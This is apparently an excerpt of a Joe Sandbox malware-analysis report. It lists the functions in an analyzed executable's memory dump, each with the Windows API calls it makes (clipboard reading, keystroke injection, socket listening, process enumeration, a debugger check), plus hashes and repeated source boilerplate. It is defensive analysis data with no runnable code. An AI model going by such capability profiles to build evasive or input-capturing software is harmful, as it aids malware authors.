                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                              Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                              • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                              Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_strncmp
                                                                                              • String ID: @oH$\$^$h
                                                                                              • API String ID: 2175499884-3701065813
                                                                                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                              Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 540024437-0
                                                                                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                              Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                              • API String ID: 0-2872873767
                                                                                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                              Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                              • __wsplitpath.LIBCMT ref: 00475644
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • _wcscat.LIBCMT ref: 00475657
                                                                                              • __wcsicoll.LIBCMT ref: 0047567B
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                              • String ID:
                                                                                              • API String ID: 2547909840-0
                                                                                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                              Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                              • FindClose.KERNEL32(?), ref: 004525FF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                              • String ID: *.*$\VH
                                                                                              • API String ID: 2786137511-2657498754
                                                                                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                              Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID: pqI
                                                                                              • API String ID: 2579439406-2459173057
                                                                                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                              Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __wcsicoll.LIBCMT ref: 00433349
                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                              • __wcsicoll.LIBCMT ref: 00433375
                                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicollmouse_event
                                                                                              • String ID: DOWN
                                                                                              • API String ID: 1033544147-711622031
                                                                                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                              Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                                              • String ID:
                                                                                              • API String ID: 3031425849-0
                                                                                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                              Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 4170576061-0
                                                                                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                              Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                              • IsWindowVisible.USER32 ref: 0047A368
                                                                                              • IsWindowEnabled.USER32 ref: 0047A378
                                                                                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                              • IsIconic.USER32 ref: 0047A393
                                                                                              • IsZoomed.USER32 ref: 0047A3A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                              Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                              • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                              • CoUninitialize.OLE32 ref: 0047863C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                              Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
